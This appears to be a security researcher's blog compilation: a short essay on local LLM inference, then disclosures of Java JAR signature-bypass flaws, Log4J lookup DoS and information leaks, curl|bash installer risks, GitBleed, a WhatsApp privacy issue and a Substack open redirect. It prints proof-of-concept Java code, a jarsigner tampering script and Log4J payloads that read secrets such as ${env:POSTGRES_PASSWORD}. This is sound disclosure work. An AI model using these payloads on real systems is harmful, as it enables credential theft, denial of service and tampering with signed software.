While majority of the GenAI investment / capex is focused on new datacenters, GPUs and hardware, is it possible that the long term future of LLM inference and training is actually on local hardware we already have? Two trends worth tracking:
1. Better local stacks.
Our local desktops, laptops and mobile phones hide a surprising amount of compute capacity which is often not used fully. For example, a recent paper estimated that M-series chips on Apple laptops can go as high as 2.9 TFLOPS for an M4 and Google’s Pixel 10 Android phone can in theory hit 1.5 TFLOPS (for comparison an NVIDIA GeForce RTX 4090 GPU can go as high as 82 TFLOPS and the H100 can go to 67 TFLOPS, at FP32).
Local inference stacks like llama.cpp, Ollama and LM Studio have been getting better and better, with underlying improvements such as Apple’s support for inference via MLX, support for AMD GPUs, and integration into the overall ecosystem via things like MCPs, tools, local web interfaces for coding assistants, etc. All have been showing better and better performance over the past year – as an example, compare Cline’s recommendations for local models between May 2025:
When you run a “local version” of a model, you’re actually running a drastically simplified copy of the original. This process, called distillation, is like trying to compress a professional chef’s knowledge into a basic cookbook β you keep the simple recipes but lose the complex techniques and intuition. … Think of it like running your development environment on a calculator instead of a computer β it might handle basic tasks, but complex operations become unreliable or impossible.
Local models with Cline are now genuinely practical. While they wonβt match top-tier cloud APIs in speed, they offer complete privacy, zero costs, and offline capability. With proper configuration and the right hardware, Qwen3 Coder 30B can handle most coding tasks effectively.The key is proper setup: adequate RAM, correct configuration, and realistic expectations. Follow this guide, and youβll have a capable coding assistant running entirely on your hardware.
Even OpenClaw (reluctantly) supports local models π
2. Model improvements including inference and training.
Because of pressure to squeeze out better performance from existing hardware, open source inference engines such as VLLM and PyTorch, and the models themselves have been focusing on faster inference speed and throughput. For example, VLLM recently announced 38% performance improvements for OpenAI’s gpt-oss-120b model. However, what is more interesting is fundamental changes in models themselves. DeepSeek for example, released a paper recently showing how to increase transfomer performance via memory lookups. Several model providers such as Google / Gemini and LiquidAI have been releasing small models intended to run on limited hardware such as phones.
On the training side, Andrej Karpathy has recently posted about he managed to optimize the training process for GPT-2 from 32 TPUs to a single H100 GPU:
Seven years later, we can beat GPT-2’s performance in nanochat ~1000 lines of code running on a single 8XH100 GPU node for ~3 hours. At ~$24/hour for an 8ΓH100 node, that’s $73, i.e. ~600Γ cost reduction. That is, each year the cost to train GPT-2 is falling to approximately 40% of the previous year. (I think this is an underestimate and that further improvements are still quite possible).
These improvements will trickle down to local hardware as well over time
Implications for security and other things
If the long term picture consists of models running locally on the hardware the rest of the stack runs on, the security of those models starts to look very different. For example, in an enterprise environment, it is possible to today to monitor and block network connectivity to outside model providers like OpenAI, Anthropic, etc. but if everything is running locally, the goal of network security would instead be to look for large downloads of model weights and scan the local hardware for models or excessive GPU usage. Second, centralized controls such as what model can someone use won’t work anymore if those models are running locally – and instead deploying those controls starts to look like what we do today for locally-installed software with OS-level scanning and reporting. Third, supply chain issues with models such as malicious models, updating insecure models, etc. suddenly become very important – again requiring us to borrow the tricks we use today for local software and open source dependencies.
For all of the new data centers being built – is there truly a need if existing local hardware can eventually do the job?
“This building is protected by a very secure system … But like all systems it has a weakness. The system is based on the rules of a building. One system built on another.” (Keymaker – “The Matrix Reloaded”)
Summary
Six issues related to how Java handles JAR files, ZIP files and digital signatures in JAR files were reported to and fixed by OpenJDK / Oracle. These could be used to hide malicious files inside JARs, bypass digital signatures and overwrite existing content. One of the issues was assigned as CVE (CVE-2024-20932) and the rest were fixed without CVE assignments.
Technical Details
The Java programming language supports the use of digital signatures to validate the authenticity of Java class files packaged into JAR files (JAR = Java ARchive). These are based on the ZIP file format with additional of a special digital signature schema which uses a set of special manifest files included in the ZIP file itself containing digital signatures applying to the rest of the files in the archive (unlike other signature schemes such as PGP or sigstore). This can lead to security issues related to how the manifest files or other files in the archive are stored or processed.
Java also includes a number of classes and CLI utilities dealing with JAR files – all supporting digital signature validation:
JarInputStream – reads ZIP files in streaming mode, ignoring the central directory
jar (cli) – used to create, update and extract JARs
jarsigner (cli) – used to sign and verify digital signatures for JAR files
A key point to keep in mind regarding ZIP is that entries in the ZIP files appear through out the file (local) but also appear in an index located in the end of the file (central directory). Normal processing is done by reading the central directory then referencing entries from there but it is possible to process ZIP files in “streaming” mode by ignoring the central directory and reading the entries directly. This can introduce an number of security issues by exploiting the differences between the two approaches. A good overview of this, the ZIP format and various ZIP attacks can be found here: https://www.youtube.com/watch?v=8Uue8tARdNs.
Issue #1 – Duplicate File Handling in jar CLI
The Java jar cli did not correctly handle a case where two entries with the same file name would appear in the same JAR file. This could be exploited to hide a malicious file as a second duplicate entry and used to overwrite a legit file already in the JAR or bypass signature validation. This issue was fixed by adding detection for this edge case on May 28th, 2025 and the fix was shipped in the following JDK versions: 25. See release notes:
“The jar --validate command has been enhanced to identify and generate a warning message for: … Duplicate entry names”
The following Java code can be used for generate a proof of concept JAR:
import java.io.*;
import java.util.zip.*;
import java.lang.reflect.*;
public class CreateDuplicateJar {
public static void main(String[] args) throws Exception {
FileOutputStream fos = new FileOutputStream("duplicate.jar");
ZipOutputStream zos = new ZipOutputStream(fos);
// Clear the names HashSet to allow duplicates
Field namesField = ZipOutputStream.class.getDeclaredField("names");
namesField.setAccessible(true);
zos.putNextEntry(new ZipEntry("Test.class"));
zos.write("first".getBytes());
zos.closeEntry();
((java.util.HashSet)namesField.get(zos)).clear();
zos.putNextEntry(new ZipEntry("Test.class"));
zos.write("second".getBytes());
zos.closeEntry();
zos.close();
}
}
You can test this on a fixed version of the JDK (25) by running the validate command:
jar --validate duplicate.jar
Issue #2 – Overwriting existing files via jar CLI (-x)
The Java jar cli includes an extract (-x) option which extracts files to the file system. The tool didn’t check if the files being extracted are overwriting a file already present. This can be exploited to overwrite security sensitive files without user’s knowledge. The issue was fixed by adding a new option (–keep-old-files / -k) which will prevent overwriting of files. This was fixed on October 23th, 2024 and shipped in the following JDK versions: 21.0.6, 17.0.14, 11.0.27 and 8u452. The following was added to the release notes:
“The jar tool’s extract operation has been enhanced to allow the --keep-old-files and the -k options to be used in preventing the overwriting of existing files. … Either of these commands will extract the contents of foo.jar. If an entry with the same name already exists in the target directory, then the existing file will not be overwritten.”
The following shell script can be used as proof of concept:
The ZIP classes in Java failed to correctly handle an edge case where two entries exist in a ZIP file, one as a file and another that’s a directory. Can be exploited to bypass certain restrictions or hide malicious data. This was fixed on January 9th, 2024 and shipped in the following JDK versions: 17.0.19. CVE-2024-20932 was assigned to this issue:
“It was discovered that the Libraries component in OpenJDK failed to properly handle ZIP archives that contain a file and directory entry with the same name within the ZIP file. This could lead to integrity issues when extracting data from such archives. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.”
The following Java code is a proof of concept for this issue:
import java.io.*;
import java.util.zip.*;
public class ZipDuplicateEntryPOC {
public static void main(String[] args) throws Exception {
String zipName = "poc.zip";
// Create ZIP with both "test" file and "test/" directory
try (ZipOutputStream zos = new ZipOutputStream(new FileOutputStream(zipName))) {
Issue #4 – Incorrect handling of duplicate manifest files (JarInputStream)
The JarInputStream incorrectly handled cases where the manifest would appear twice in the same JAR file in regards to digital signatures. This was fixed on April 16th, 2025 and shipped in the following JDK versions: 21.0.7, 17.0.15, 11.0.27 and 8u452. See release notes:
“The JarInputStream class now treats a signed JAR as unsigned if it detects a second manifest within the first two entries in the JAR file. A warning message "WARNING: Multiple MANIFEST.MF found. Treat JAR file as unsigned." is logged if the system property, -Djava.security.debug=jar, is set.”
No POC code is available
Issue #5 – Digital signature bypass via local/central header confusion
The various CLIs and classes handling JAR files read file entries either as streaming (local headers) or central directory mode. It is possible for an attacker to exploit the differences between the various implementations by adding file entries to the local headers which will pass digital signature validation based on central directory and then be extract when local headers / streaming mode is used. This issue was fixed by adding detection for this edge case on May 28th, 2025 and the fix was shipped in the following JDK versions: 25.b26. See release notes:
“The jar --validate command has been enhanced to identify and generate a warning message for … Inconsistencies in the ordering of entries between the LOC and CEN headers”
No POC code is available
Issue #6 – No detection of signed content being removed (jarsigner)
The Java jarsigner cli failed to detect when a digitally signed JAR file had some file entries removed. This can be exploited to impact security by removing service provider classes or security policy files. The issue was fixed by adding detection of deleted content that was digitally signed and the fix was shipped in the following JDK versions: 21.0.8, 17.0.16, 11.0.28 and 8u462. This was fixed on October 2nd, 2024 – see release notes:
“If an entry is removed from a signed JAR file, there is no mechanism to detect that it has been removed using the JarFile API, since the getJarEntry method returns null as if the entry had never existed. With this change, the jarsigner -verify command analyzes the signature files and if some sections do not have matching file entries, it prints out the following warning: “This JAR contains signed entries for files that do not exist”. Users can further find out the names of these entries by adding the -verbose option to the command.”
The following shell script can be used as a proof of concept:
echo -e "\n[!] ATTACK: Removing secret.txt from signed JAR..."
zip -d app.jar secret.txt
echo -e "\n[*] Verifying JAR after removal..."
jarsigner -verify app.jar
echo -e "\n[*] Checking JAR contents..."
jar tf app.jar
echo -e "\n[!] Result: JAR still appears signed but secret.txt is gone!"
echo "[!] The signature for secret.txt remains in META-INF/*.SF"
echo "[!] This could hide evidence of file removal or tampering"
# Cleanup
rm -f secret.txt normal.txt app.jar keystore.jks
Disclosure Information and References
With exception of issue # 3 above (CVE-2024-20932), all remaining issues were not issued a CVE and some received an in-depth security fix acknowledgement by Oracle / OpenJDK.
The original four Log4shell vulnerabilities in Log4J v2 that were discovered and patched in December of 2021 included two additional vulnerabilities that were not publicly known at the time: a denial of service and an information disclosure. The root cause of these issues is other string lookups in the Log4J library. These were publicly disclosed by the vendor in September 2022 via documentation updates and are considered by the vendor part of these original four issues, so no code changes are planned and no new CVEs were issued.
Previously recommended mitigations that were widely used (such as removing the JNDiLookup class) are insufficient to fix these issues and users running these mitigations should update as soon as possible to patched version. Systems that provide access to the Log4J configuration files remain vulnerable.
About Log4J, Log4Shell and Related CVEs
Logging is a fundamental requirement in software development. While Java provided a logging API since Java 1.4 (2002), Log4J existed since 1999 and offers a lot more features. It is also more popular than other frameworks leading to Log4J being used in a lot of Java applications. In December 2021, a number of serious security vulnerabilities were disclosed and patched in Log4J, with the most critical one allowing a remote attacker achieve remote code execution.
These included:
CVE-2021-44228 (CVSS 10.0) aka βLog4Shellβ β βallows Lookup expressions in the data being logged exposing the JNDI vulnerabilityβ
CVE-2021-45046 (CVSS 10.0) β βWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup patternβ
CVE-2021-44832 (CVSS 6.6) – βan attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URIβ
CVE-2021-45105 (CVSS 5.9) β βdid not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.β
The timeline of the disclosure for these issues is as follows (from CSRB public report, page 3):
The core cause for these four issues are from string lookups which enabled attackers to inject unvalidated data into an application and exploit lookups, similar to SQL injection. The most severe of these exploits enables attackers to load code from a remote server via JNDI and execute it (RCE) – aka Log4Shell.
An example payload for Log4shell via the JNDI lookup type:
Here is an illustration of a Log4J attack pattern (from the HHS report, page 19):
The patches were released according to the following timeline:
Date
Version Released
CVEs Fixed
Notes
2021-12-10
2.15.0*
CVE-2021-44228
Fix for main Log4Shell issue, disables lookups but allows them to be-re-enabled via a property
2021-12-13
2.16.0*
CVE-2021-45046
Fix for context lookups issue; disables lookups for logged data
2021-12-18
2.17.0
CVE-2021-45105
Fix for denial of service issue; disables most recursive lookups
2021-12-28
2.17.1
CVE-2021-44832
Fix for configuration file issue; limits JNDI context URL to βjavaβ
Shortly after these releases, Amazonβs Corretto Team released a hotpatch containing fixes for these two issues that could be applied to a running JVM as an agent (see blog post and GitHub repository). Other issues were not covered by the hotpatch.
As of December 2021, the following mitigations were recommended by the vendor (Apache) if users were unable to upgrade (see archived security page from Jan 2022):
Log4Shell issues (CVE-2021-44228 and CVE-2021-45046) – “remove the JndiLookup class from the classpath”Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class”
See also the hotpatch option above
For context lookup related issues (CVE-2021-45046 and CVE-2021-45105):
“In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).”
“Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.”
String Interpolation, Java EE and How They Intersect
One of the features found in Log4J and other Java libraries is property substitutions (aka lookups or message interpolation). They enable placeholders like ${xxx:yyy} to be replaced with other values, similar to shell and programming languages. In Log4J, lookups are used to make configuration easier and are meant to be used in configuration files, not in data being logged. They were added to Log4J in v2.0 (October 2010). At some point, lookups were changed to allow interpolation against in incoming data being logged (most likely in October 2011). Over time additional lookup classes were added β and JNDI lookups were added in July 2013. The JNDI code connects to the Java EE legacy code from 1990s.
Unfortunately, if not used properly, this functionality can lead to security issues. The root cause for these issues is that there were multiple systems that should not have been connected:
String lookups in config files.
Processing of incoming log messages with untrusted data.
Legacy 1990s Java EE/JNDI code.
The following is the code from the MessagePatternConverter class which processes incoming log messages. As you can see, it looks for “$” and passes the call to the StrSubstitutor class:
for (int i = offset; i < workingBuilder.length() - 1; i++) { if (workingBuilder.charAt(i) == '$' && workingBuilder.charAt(i + 1) == '{') { final String value = workingBuilder.substring(offset, workingBuilder.length()); workingBuilder.setLength(offset); workingBuilder.append(config.getStrSubstitutor().replace(event, value)); } }
The StrSubstitutor class is the main entry point into lookup functionality within Log4J. It relies on the StrLookup interface which is implemented by many classes, each providing different type of lookup (most are in the org.apache.logging.log4j.core.lookup package). These get loaded via a plugin architecture and create connections to other components (custom lookups are also supported). One of the lookups provides Java Naming and Directory Interface (JNDI) support – as implemented in the JNDILookup class.
The following is the StrLookup interface which provides a simple way to do lookups:
And this code in the JNDILookup class creates a bridge between lookups and the legacy JNDI (Java EE) code still lingering in Java:
public String lookup(final LogEvent event, final String key) { if (key == null) { return null; } final String jndiName = convertJndiName(key); try (final JndiManager jndiManager = JndiManager.getDefaultManager()) { return Objects.toString(jndiManager.lookup(jndiName), null); } catch (final NamingException e) { β¦
Technical Details – Vulnerability #1 – Denial of Service
Many of string lookup types in Log4J are recursive and can be nested inside other lookups (see code here). Each nested function call uses part of Javaβs stack memory which is distinct from the main (heap) memory used for majority of processing. Stack memory is configured via the β-Xssβ parameter and defaults to anywhere between 1 MB to 1 GB depending on OS and Java version. Exceeding this memory will result in a StackOverFlowError.
While recursive lookups are mentioned in CVE-2021-45105, that CVE was thought to be limited to non-standard configurations involving context lookups. However, it actually turns out that this issue can be exploited in default configurations similar to the way Log4Shell by sending a malicious payload to system that will try to log it. This was fixed when lookups were disabled, however, previous versions and any systems exposing the Log4J configuration remain vulnerable in default configurations. A recursive payload sent to an impacted application will be processed by Log4J recursively until the application runs out of stack memory.
You can check the size of the stack memory in Java via the following command:
In a normal version, the inner lookup ( ${java:runtime} ) will return the build information about the JVM while the outer lookups ( ${lower:xxx} ) will convert the information to lower case as follows:
However, in a Java configuration with not enough memory and vulnerable Log4J version, it will crash as follows:
Payload size: 915 Exception in thread "main" java.lang.StackOverflowError at java.base/java.lang.AbstractStringBuilder.checkRangeSIOOBE(AbstractStringBuilder.java:1809) at java.base/java.lang.AbstractStringBuilder.getChars(AbstractStringBuilder.java:508) at java.base/java.lang.StringBuilder.getChars(StringBuilder.java:91) at org.apache.logging.log4j.core.lookup.StrSubstitutor.getChars(StrSubstitutor.java:1401) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:939) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:978) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:978)
Technical Details – Vulnerability #2 – Information Disclosure
The JNDI lookup turned out to be dangerous – but itβs just one of the many lookup types available in Log4J. While fixes for Log4Shell disable lookup interpolation in log messages, in versions prior to 2.15 all lookups are available. Even today, in most recent versions lookups are still available in configuration files β even for latest versions of Log4J (since access to the configuration files is outside the threat model for the project). Additionally, lookups remain available if the JNDILookup class is removed (as per recommended mitigation back in 2021). This was a common mitigation to avoid upgrading Log4J library.
In these three scenarios (versions prior to 2.15, versions with JNDILookup class removed or any version with access to the configuration files), other lookup types remain available and can leak information about the underlying system.
The following lookup types are available in Log4J (see documentation):
Pattern
Description
Pattern
Description
${bundle:xxx:xxx}
Resource bundles
${log4j:xxx}
Log4J configuration properties
${ctx:xxx}
Thread context map
${lower:xxx}
Converts to lower case
${date:xxx}
Date/time
${main:xxx}
Executable arguments / main()
${docker:xxx}
Docker attributes
${map:xxx}
Map lookup
${env:xxx}
Environment variables
${marker:xxx}
Markers
${event:xxx}
Log event object fields
${spring:xxx}
Spring properties
${java:xx}
Java runtime information
${sd:xxx}
Structured data
${jndi:xxx}
JNDI remote lookups
{sys:xxx}
System properties
${jvmrunargs:xxx}
JVM runtime args (JMX only)
${upper:xxx}
Converts to upper case
${k8s:xxx}
Kubernetes container information
${web:xxx}
Servlet context variables/attributes
Many of the available lookups return information such as environment variables, system properties, Spring properties, runtime information, secrets, etc. Lookups that return data such as runtime attributes can be used for initial information gathering by a third party. However, most of the lookups do not support wildcards β the name of the variable, property, etc. being retrieved must be known.
Furthermore, access to the logs is required to read the information from these lookups so the attacker will not be able to execute this attack blindly. Scenarios with access would include error messages or cloud/SAAS applications where users have access to the result logs. Example of such scenario:
Exploit example
Payload examples:
Pattern
Description
${env:POSTGRES_PASSWORD}
Postgres password stored in an environment variable
${log4j:log4j2.trustStorePassword}
Keystore password from Log4J properties
${spring:spring.mail.password}
SMTP password from Spring
${docker:containerName}
Container name in Docker
${k8s:masterUrl}
Kubernetes Master URL
${java:runtime}
Runtime information about the JVM
Code to test the exploit:
import org.apache.logging.log4j.LogManager;
public class Test2 { public static void main(String[] args) { String payload = "${java:runtime}"; LogManager.getRootLogger().error(payload); } }
In a patched version, the lookup will not work since all lookups are disabled and the following output will be produced:
This issue was publicly disclosed by Apache / Log4J project in September 2022 part of the Log4J v2.19 release. This was done via an update to the security page (see archived security page and Git update). Because the Log4J project considers these to be part of CVE-2021-45046 and CVE-2021-44228, as well as being fixed in previous releases, no new CVEs were issued and no code changes were made. At this of writing (June 2025), the CVE descriptions were not fully updated in NVD / CVE database but do appear on the Log4J security page. The previous mitigation information about removing the JNDILookup class has been removed from the Log4J security page.
NOTE: many vendors using Log4J in their products publicly advertised the removal of the JNDILookup class as a mitigation. For those vendors, if they have not upgraded – then they remain vulnerable to the two issues in this post. Additionally, products/services allowing access to the Log4J config files remain vulnerable even in the most recent versions.
All versions of Log4J v2 prior to v2.15 except for v2.12.2-4 (Java 7) and v2.3.1-2 (Java 6).
In versions v2.15, v2.12.2 (Java 7) and v2.3.1 (Java 6), lookups in log messages are disabled by default but can be re-enabled. If lookups are re-enabled or context lookups are used (CVE-2021-45046), these versions are impacted.
Versions v2.16+, v2.12.3+ (Java 7) and v2.3.2 (Java 6) remain vulnerable if access is granted to the configuration files
Log4J v1 should not be impacted except when JMSAppender is used (see CVE-2021-4104)
Users should upgrade to a version that disables lookups entirely against log messages β v2.16+, v2.12.3 (Java 7) or v2.3.2 (Java 6). Other tools such as WAF and IDS systems should be updated with signatures that look for patterns to detect these issues
For users unable to upgrade, prior mitigations recommended by the vendor will not protect against these issues. While it might be possible to backport existing patches to disable lookups, this it not recommended. Other public mitigations such as the Java hotpatch agent referenced above do not address these issue.
Access to Log4J configuration files should not be allowed β lookups are still available in configuration files and there might be other attack vectors. Note that as of February 2023, security reports assuming access to the Log4J configuration βno longer qualify as vulnerabilitiesβ
CVE-2021-44228 – “JNDI lookup can be exploited to execute arbitrary code loaded from an LDAP server”
CVE-2021-44832 – “Remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source”
CVE-2021-45046 – “Information leak and remote code execution in some environments and local code execution in all environments”
CVE-2021-45105 – “An attacker with control over Thread Context Map data can cause a denial of service when a crafted string is interpreted”
Acknowledgements
The author would like to thank everyone who was involved in the disclosure process for these issues – you know who you are. Thank you for LTS for putting up with this for so long.
Timeline
2021-12-09: Original Log4Shell disclosure and fix by the vendor (Apache)
2022-09-10: Public disclosure of these two vulnerabilities by the vendor (Apache)
2024-11-08: Public talk about these issues at BSides Delaware 2024
The bootstrap process for Google’s cloud SQL Proxy CLI uses the “curl | bash” pattern and didn’t document a way to verify authenticity of the downloaded binaries. The vendor updated documentation with information on how to use checksums to verify the downloaded binaries.
2022-08-30: Initial report to the vendor 2022-08-30: Vendor acknowledged the report 2022-09-27: Vendor rejected the report as a security issue 2023-03-03: Vendor reported that a fix has been implemented 2023-03-19: Public disclosure
Due to a discrepancy in Git behavior, partial parts of a source code repository are visible when making copies via the “git clone” command. There are additional parts of the repository that only become visible when using the “–mirror” option. This can lead to secrets being exposed via git repositories when not removed properly, and a false sense of security when repositories are scanned for secrets against a cloned, non-mirrored copy.
Attackers and bug bounty hunters can use this discrepancy in Git behavior to find hidden secrets and other sensitive data in public repositories.
Organizations can mitigate this by analyzing a fuller copy of their repositories using the “–mirror” option and remove sensitive data using tools like BFG or git-filter-repo (which do a more thorough job).
Git is a popular open source tool used for version control of source code. When users make a copy of a local or remote git repository, they use the “git clone” command. However, this command doesn’t copy all of the data in the originating repository such as deleted branches and commits. On the other hand, there is a “–mirror” option which copies more parts of the repository. The discrepancy between the two behaviors can lead to secrets and other sensitive data lingering in the original repository. Additionally, existing tools for secrets detection often operate on cloned repositories and do not detect secrets in the mirror portion of the repository unless cloned via the “–mirror” command.
We also tested forking in GitHub and GitLab, and in both systems forking uses the regular “git clone” behind the scenes and not the “–mirror” version. That means that repositories containing secrets in the mirrored portion will not propagate those secrets to their forks.
We provide two examples of repositories containing hidden secrets that are only visible when cloning with the “–mirror” option. These can be found here:
gb_testrepo_reset – secret is retained after the git history is reset
If you try to clone the repository without the “–mirror” option, and retrieve the secret, it will not work:
And:
If you try the same with the “–mirror” option, you can now retrieve the secret (also note the larger number of objects retrieved):
And:
If you run gitleaks on the cloned repositories, no secrets are found:
However, running gitleaks on the mirrored copies, finds the secrets stashed in deleted areas:
Tooling
There are plenty of existing tools out there that can manipulate git repositories, scan them for secrets and remove specific commits. During our research, we used git for checking out repositories, git-filter-repo for figuring out the delta between cloned and mirrored copies of the same repository, and gitleaks to scan for secrets.
For examples on how to use these tools, please see sample scripts that we have published to GitHub.
Mitigations
Organizations can mitigate this by analyzing a larger part of their repositories using the “–mirror” option and remove sensitive data using tools like BFG or git-filter-repo. Garbage collection and pruning in git is also recommended.
Organizations should not analyze regular cloned copies (without the “–mirror” option) since that may provide a false sense of security, and should not rely on methods of removing secrets such as deleting a branch or rewinding history via the “git reset” command.
Branding
There seems to be a recent trend to name vulnerabilities. While we think it’s silly, why not go with the flow?
Therefore we named this one “GitBleed“, since it leads to bleeding of secrets from repositories – with a mirrored logo since it involves mirrored repositories.
The bootstrap process for Oracle Cloud CLI using the “curl | bash” pattern was insecure since there was no way to verify authenticity of the downloaded binaries. The vendor is now publishing checksums that can be used to verify the downloaded binaries.
Vulnerability Details
As part of our ongoing research into supply chain attacks, we have been analyzing bash installer scripts using the “curl | basj” pattern. Oracle provides such script used to install the CLI command for interaction with Oracle Cloud. However, there was no way to check whether the files that the script downloads are legitimate, which could potentially open the end-user to supply chain attacks. The installer is run as follows:
2021-04-21: Initial report to the vendor 2021-04-21: Vendor acknowledged the report 2021-05-04: Vendor communicated that a fix is pending 2021-12-28: Vendor reported that a fix has been implemented and credit will be provided in an advisory 2022-01-18: Vendor advisory published 2022-02-06: Public disclosure
Over the last few weeks, security teams everywhere have been busy patching Log4J vulnerabilities. In this article we want to talk about the three things you can tell your friends why this is way worse.
Ubiquity
This vulnerability impacts impacts Java applications and those can be found almost anywhere: enterprise, vendor applications, database drivers, Android phones and even the smartchip on the credit card in your wallet (Java Card). Additionally, majority of Java applications use log4j to handle logging, often involving user input. While your phone is probably not exploitable, the sheer number of places where log4j can be hiding makes this is hard to fix.
Severity
There are vulnerabilities that come out all the time, but few of them reach the highest possible level of severity: remote code execution (RCE) and this one hits that ticket. That means that every server running Java within your company becomes everyone’s computer – an attacker can run anything they want there and then use that as a springboard to tunnel in further.
Exploitability
There are many severe vulnerabilities out there that require specialized knowledge to exploit including speaking dead computer languages and building weird binaries during a full moon. With this one, you can begin the exploit by copy/pasting a tweet into a search bar combined with DNS.
WhatApp for Android retains contact info locally after contacts get deleted. This would allow an attacker with physical access to the device to check if the WhatsApp user had interactions with specific contacts, even though they have been deleted.
Vulnerability Details
When a contact is deleted on WhatsApp, their information about security code changes is retained (while the chat content is not). The only way to get rid of that is to select “Clear Chat” for the contact before deleting it. Even deleting the chat itself doesn’t do it unless the “Clear Chat” operation is done first. The “security code change notifications” option must be enabled in order for this to work.
Someone getting access to the user’s device can figure out whether they ever chatted with specific contacts, even if those contacts and their chats are no longer on the device. This is a privacy issue – especially for people like journalists and those living in dangerous countries.
Since WhatsApp uses Android’s contact app for contact information but supports chats with numbers that aren’t contacts, our theory is that the application retains information about security code changes even for contacts no longer on the device. There seems to be a discrepancy between how the “Clear chat” option and “Delete Chat” options are implemented in the application, with the first option deleting security notification data.
To reproduce:
Delete a chat with a contact that had security code changes before.
Delete the contact from the device via the Android Contacts app.
Re-add contact to the device via the Android Contacts app.
Start a new chat in WhatsApp with that contact but do not send any messages.
Observe that security code changes are listed with dates in the chat.
Select “Clear Chat” to remove the security code changes, and repeat sterps 1-4. Observe that the security code changes no longer appear.
Tested on WhatsApp for Android, app version 2.21.20.20, running on Android 12.
Vendor Response
We haven’t retested on a more recent version but our recommendation to users is to use the “Clear Chat” option in order to prevent this.
The vendor will not be fixing this issue, here is their response:
As part of the attack scenario you describe getting access to a person’s WhatsApp account to obtain private data, as you mention yourself, people do have a way to remove these messages from their account, if a bad actor gets access to their WhatsApp account prior to that person deleting that information then they will be able to view this information. As such, we are closing this report.
2021-10-24: Initial report sent to the vendor, report ID assigned 2021-10-27: Vendor asks for more info, additional info and screenshots sent 2021-11-03: Vendor sent interim status report, still investigating 2021-11-09: Vendor rejects the vulnerability and closes the report 2021-12-30: Public disclosure
Substack had a open redirect vulnerability in their login flow which would have allowed an attacker to facilitate phishing attacks. The vendor has deployed a fix for this issue.
Vulnerability Details
Substack is an online platform that allows users to create and operate free and paid subscription newsletters. This platform had an open redirect vulnerability in its login flow which would redirect users to any sites after login completed. This could have been used by an attacker to facilitate phishing attacks targeting Substack users and steal their credentials.
The vulnerability was due to the fact that the “redirect parameter” in the login flow wasn’t been validated to make sure that the redirect only goes to a specific set of URLs. The attacker could specify their own redirect URL as follows:
Once a correct reporting channel was established, the issue was reported to the vendor and a fix was deployed limited the redirect parameter to Substack-specific URLs.
2021-07-08: Initial contact with the vendor, asking for a correct reporting channel 2021-07-09: Initial reply received, confirming communication channe again – no response from the vendor 2021-07-13: Pinged again – no response; pinged company co-founders on Twitter 2021-07-13: Communication with the vendor re-established, technical details sent 2021-07-23: Pinged for status, no response 2021-07-29: Vendor responded that a fix has been implemented 2021-07-29: Fix confirmed, vendor pinged for disclosure coordination – no response 2021-08-22: Public disclosure